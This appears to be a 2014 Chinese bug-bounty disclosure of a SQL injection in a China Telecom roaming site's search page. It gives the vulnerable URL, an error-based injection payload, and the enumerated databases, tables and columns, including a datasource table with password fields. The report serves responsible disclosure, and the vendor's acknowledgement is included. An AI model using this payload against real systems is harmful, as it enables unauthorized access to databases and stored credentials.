漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:中国电信某分站sql注入漏洞
提交时间:2014-07-23 17:48
修复时间:2014-09-06 17:52
公开时间:2014-09-06 17:52
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情 披露状态:
2014-07-23: 细节已通知厂商并且等待厂商处理中 2014-07-28: 厂商已经确认,细节仅向厂商公开 2014-08-07: 细节向核心白帽子及相关领域专家公开 2014-08-17: 细节向普通白帽子公开 2014-08-27: 细节向实习白帽子公开 2014-09-06: 细节向公众公开
简要描述: rt
详细说明: 中国电信国际漫游 搜索处的注入漏洞。 在搜索栏,输入1’,带上单引号。会发现出错。返回的关键信息是:
org.springframework.web.util.NestedServletException: Request processing failed; nested exception is org.springframework.jdbc.BadSqlGrammarException: StatementCallback; bad SQL grammar [select count(*) from (select * from T_LUCENE_RELATEDKEYWORDS a WHERE upper(a.keyName) like '%1'%' and a.isValid=1 order by orders desc) t]; nested exception is java.sql.SQLException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' and a.isValid=1 order by orders desc) t' at line 1 org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:656) org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:549) javax.servlet.http.HttpServlet.service(HttpServlet.java:617) javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
数据是直接带入sql语句中的。 找一个注入点:
http://manyou.189.cn/search//front/search.do?key=1&className=%E8%87%AA%E5%8A%A9%E6%9C%8D%E5%8A%A1
payload:key=1' AND (SELECT 3497 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,113,102,58),(SELECT (CASE WHEN (3497=3497) THEN 1 ELSE 0 END)),CHAR(58,100,101,98,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'eDxm'='eDxm&className=自助服务 注入结果如下:
available databases [3]: [*] information_schema [*] jsearch [*] manyouideal
Database: manyouideal [1 table] +--------------+ | km_gm_common | +--------------+
Database: manyouideal Table: km_gm_common [42 columns] +--------------------+---------------+ | Column | Type | +--------------------+---------------+ | CALL_CHINA_NO_HK | varchar(1000) | | CALL_NATIVE | varchar(1000) | | CALL_OTHER_COUNTRY | varchar(800) | | CARDTYPE | varchar(1000) | | CARDTYPESORT | int(11) | | CDMA1X | varchar(500) | | CITY | varchar(1000) | | CONSULATE_PHONE | varchar(500) | | COUNTRY | varchar(1000) | | COUNTRY_AREA | varchar(500) | | COUNTRY_CODE | varchar(500) | | COUNTRY_NAME_EN | varchar(500) | | EMBASSY_PHONE | varchar(500) | | EMERGENCY_PHONE | varchar(500) | | FREQUENCY_RANGE | varchar(500) | | GPRS | varchar(500) | | HEAD_133 | varchar(800) | | ID | int(11) | | IDCODE | varchar(50) | | INTERNET | varchar(300) | | JIANPIN | varchar(50) | | MIFI | varchar(300) | | MSG_CHAR_LIMIT | varchar(500) | | NATIVE_MOBILEPHONE | varchar(500) | | NATIVE_TALK | varchar(500) | | NETWORK | varchar(1000) | | NETWORK_DEFAULT | varchar(500) | | NOTICE | varchar(1500) | | OLDID | int(11) | | OUTLET | varchar(100) | | PINYIN | varchar(50) | | RECEIVE_CALL | varchar(800) | | RECEIVE_CODE | varchar(500) | | RECEIVE_SHORTMSG | varchar(500) | | REMOTE_MOBILEPHONE | varchar(500) | | REMOTE_TALK | varchar(500) | | SEND_CHINA_LAND | varchar(500) | | SEND_OTHER_COUNTRY | varchar(500) | | SHORTMSG_CODE | varchar(500) | | SORTNUMER | int(11) | | VOLTAGE | varchar(200) | | WIFI | varchar(500) | +--------------------+---------------+
Database: jsearch [25 tables] +------------------------------+ | country | | t_lucene_ad | | t_lucene_class | | t_lucene_config | | t_lucene_content | | t_lucene_datasource | | t_lucene_ftpserverlist | | t_lucene_hotlabels | | t_lucene_indexlogs | | t_lucene_indextask | | t_lucene_indextask_ftpserver | | t_lucene_keyrecovery | | t_lucene_keywordhits | | t_lucene_keywordhits_0612 | | t_lucene_keywords | | t_lucene_minganci | | t_lucene_module | | t_lucene_profile | | t_lucene_relatedkeywords | | t_lucene_searchserver | | t_lucene_servernode | | t_lucene_typehits | | t_lucene_users | | t_lucene_visitlog | | t_lucene_weight | +------------------------------+
只是检索信息的数据,不过这种还是需要关注下。
漏洞证明: 给出lucene的一个表的列来进一步证明吧。
Database: jsearch Table: t_lucene_datasource [10 columns] +----------------+---------------+ | Column | Type | +----------------+---------------+ | addDate | timestamp | | content | text | | dataSourceType | varchar(200) | | dataSql | varchar(2000) | | driverName | varchar(200) | | id | int(6) | | name | varchar(200) | | password | varchar(200) | | url | varchar(500) | | userName | varchar(200) | +----------------+---------------+
修复方案: 漏洞回应 厂商回应: 危害等级:中
漏洞Rank:10
确认时间:2014-07-28 09:35
厂商回复: CNVD确认并复现所述情况,已经转由CNCERT直接通报给中国电信集团公司,由其后续下发给省公司及网站管理单位处置。
最新状态: 暂无
漏洞评价:
评论
2014-07-23 17:52 |
魇 ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)
2014-07-23 21:33 |
reality0ne ( 路人 | Rank:18 漏洞数:7 )
2014-09-06 19:58 |
玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )